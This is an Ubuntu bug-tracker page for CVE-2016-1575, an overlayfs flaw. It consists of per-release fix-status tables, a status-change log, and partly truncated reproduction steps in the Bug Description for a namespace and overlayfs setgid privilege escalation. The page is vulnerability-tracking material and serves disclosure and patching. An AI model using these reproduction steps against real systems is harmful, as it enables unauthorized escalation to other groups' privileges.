CVE-2016-1575
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
linux (Ubuntu) |
Fix Released
|
Medium
|
Unassigned | ||
Precise |
Won't Fix
|
Medium
|
Unassigned | ||
Trusty |
Fix Released
|
Medium
|
Unassigned | ||
Vivid |
Fix Released
|
Medium
|
Unassigned | ||
Wily |
Fix Released
|
Medium
|
Unassigned | ||
Xenial |
Fix Released
|
Medium
|
Unassigned | ||
Yakkety |
Fix Released
|
Medium
|
Unassigned | ||
linux-armadaxp (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Won't Fix
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-flo (Ubuntu) |
New
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
New
|
Medium
|
Unassigned | ||
Xenial |
New
|
Medium
|
Unassigned | ||
Yakkety |
New
|
Medium
|
Unassigned | ||
linux-goldfish (Ubuntu) |
New
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
New
|
Medium
|
Unassigned | ||
Xenial |
New
|
Medium
|
Unassigned | ||
Yakkety |
New
|
Medium
|
Unassigned | ||
linux-lts-quantal (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-raring (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
New
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-saucy (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
New
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-trusty (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Fix Released
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-utopic (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Fix Released
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-vivid (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Fix Released
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-wily (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Fix Released
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-lts-xenial (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
New
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-mako (Ubuntu) |
New
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
New
|
Undecided
|
Unassigned | ||
Wily |
New
|
Medium
|
Unassigned | ||
Xenial |
New
|
Medium
|
Unassigned | ||
Yakkety |
New
|
Medium
|
Unassigned | ||
linux-manta (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
New
|
Undecided
|
Unassigned | ||
Wily |
New
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-raspi2 (Ubuntu) |
Fix Released
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Fix Released
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-snapdragon (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Invalid
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
New
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned | ||
linux-ti-omap4 (Ubuntu) |
Invalid
|
Medium
|
Unassigned | ||
Precise |
Won't Fix
|
Medium
|
Unassigned | ||
Trusty |
Invalid
|
Medium
|
Unassigned | ||
Vivid |
Won't Fix
|
Undecided
|
Unassigned | ||
Wily |
Invalid
|
Medium
|
Unassigned | ||
Xenial |
Invalid
|
Medium
|
Unassigned | ||
Yakkety |
Invalid
|
Medium
|
Unassigned |
Bug Description
On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to gain group privileges of arbitrary groups that created directories with properties to be found using "find / -perm -02020", e.g.
/usr/local/
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail
For Ubuntu Trusty, following sequence can be used to reproduce the problem:
* In user/mount namespace:
rm -rf Mnt Test
mkdir Mnt Test
mount -t overlayfs -o lowerdir=
* Outside namespace
setfacl -m d:u:[your unpriv uid]:rwx Test
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidB
Test/mail/escalate ~/ReportUidGidCwd
For Ubuntu Wily:
* Inside:
mkdir Mnt Test Work
mount -t overlayfs -o lowerdir=
* Outside:
setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidB
Test/mail/escalate ~/ReportUidGidCwd
CreateSetgidBinary is from http://
See also http://
Changed in linux (Ubuntu): | |
status: | New → Incomplete |
status: | Incomplete → Confirmed |
importance: | Undecided → High |
information type: | Private Security → Public Security |
tags: | added: kernel-cve-skip-description |
Changed in linux-lts-trusty (Ubuntu Precise): | |
status: | New → Fix Released |
importance: | Undecided → Medium |
Changed in linux-lts-trusty (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-trusty (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-trusty (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-wily (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-wily (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-wily (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-wily (Ubuntu Trusty): | |
status: | New → Fix Released |
importance: | Undecided → Medium |
Changed in linux-lts-quantal (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-quantal (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-quantal (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-quantal (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux (Ubuntu Precise): | |
importance: | Undecided → Medium |
Changed in linux (Ubuntu Wily): | |
importance: | Undecided → Medium |
Changed in linux (Ubuntu Xenial): | |
importance: | High → Medium |
Changed in linux (Ubuntu Trusty): | |
importance: | Undecided → Medium |
Changed in linux-ti-omap4 (Ubuntu Precise): | |
importance: | Undecided → Medium |
Changed in linux-ti-omap4 (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-ti-omap4 (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-ti-omap4 (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-raring (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-raring (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-raring (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-raring (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-armadaxp (Ubuntu Precise): | |
importance: | Undecided → Medium |
Changed in linux-armadaxp (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-armadaxp (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-armadaxp (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-xenial (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-xenial (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-xenial (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-xenial (Ubuntu Trusty): | |
importance: | Undecided → Medium |
Changed in linux-lts-saucy (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-saucy (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-saucy (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-saucy (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-manta (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-manta (Ubuntu Wily): | |
importance: | Undecided → Medium |
Changed in linux-manta (Ubuntu Xenial): | |
importance: | Undecided → Medium |
Changed in linux-manta (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-vivid (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-vivid (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-vivid (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-vivid (Ubuntu Trusty): | |
status: | New → Fix Released |
importance: | Undecided → Medium |
Changed in linux-raspi2 (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-raspi2 (Ubuntu Wily): | |
status: | New → Fix Released |
importance: | Undecided → Medium |
Changed in linux-raspi2 (Ubuntu Xenial): | |
importance: | Undecided → Medium |
Changed in linux-raspi2 (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-mako (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-mako (Ubuntu Wily): | |
importance: | Undecided → Medium |
Changed in linux-mako (Ubuntu Xenial): | |
importance: | Undecided → Medium |
Changed in linux-mako (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-utopic (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-utopic (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-utopic (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-utopic (Ubuntu Trusty): | |
status: | New → Fix Released |
importance: | Undecided → Medium |
Changed in linux-goldfish (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-goldfish (Ubuntu Wily): | |
importance: | Undecided → Medium |
Changed in linux-goldfish (Ubuntu Xenial): | |
importance: | Undecided → Medium |
Changed in linux-goldfish (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-flo (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-flo (Ubuntu Wily): | |
importance: | Undecided → Medium |
Changed in linux-flo (Ubuntu Xenial): | |
importance: | Undecided → Medium |
Changed in linux-flo (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-lts-xenial (Ubuntu Trusty): | |
status: | New → Invalid |
Changed in linux-raspi2 (Ubuntu Xenial): | |
status: | New → Invalid |
Changed in linux-manta (Ubuntu Xenial): | |
status: | New → Invalid |
Changed in linux-snapdragon (Ubuntu Precise): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-snapdragon (Ubuntu Wily): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-snapdragon (Ubuntu Xenial): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-snapdragon (Ubuntu Yakkety): | |
status: | New → Invalid |
importance: | Undecided → Medium |
Changed in linux-snapdragon (Ubuntu Trusty): | |
status: | New → Invalid |
importance: | Undecided → Medium |
tags: | added: kernel-cve-tracking-bug |
Changed in linux (Ubuntu Vivid): | |
importance: | Undecided → Medium |
summary: |
- insecure overlayfs xattrs handling in copy_up + CVE-2016-1575 |
Changed in linux (Ubuntu Yakkety): | |
status: | Fix Released → Invalid |
Changed in linux (Ubuntu Yakkety): | |
status: | Invalid → Fix Committed |
Changed in linux-flo (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-goldfish (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-lts-quantal (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-lts-trusty (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-lts-utopic (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-lts-vivid (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-lts-wily (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-raspi2 (Ubuntu Vivid): | |
status: | New → Won't Fix |
Changed in linux-ti-omap4 (Ubuntu Vivid): | |
status: | New → Won't Fix |
I've tried reproducing this in up-to-date wily and xenial without success. I get to the "chmod 02777 Mnt/mail" step and get EPERM. Perhaps this was fixed by the same commit which fixed the other setattr-related CVE?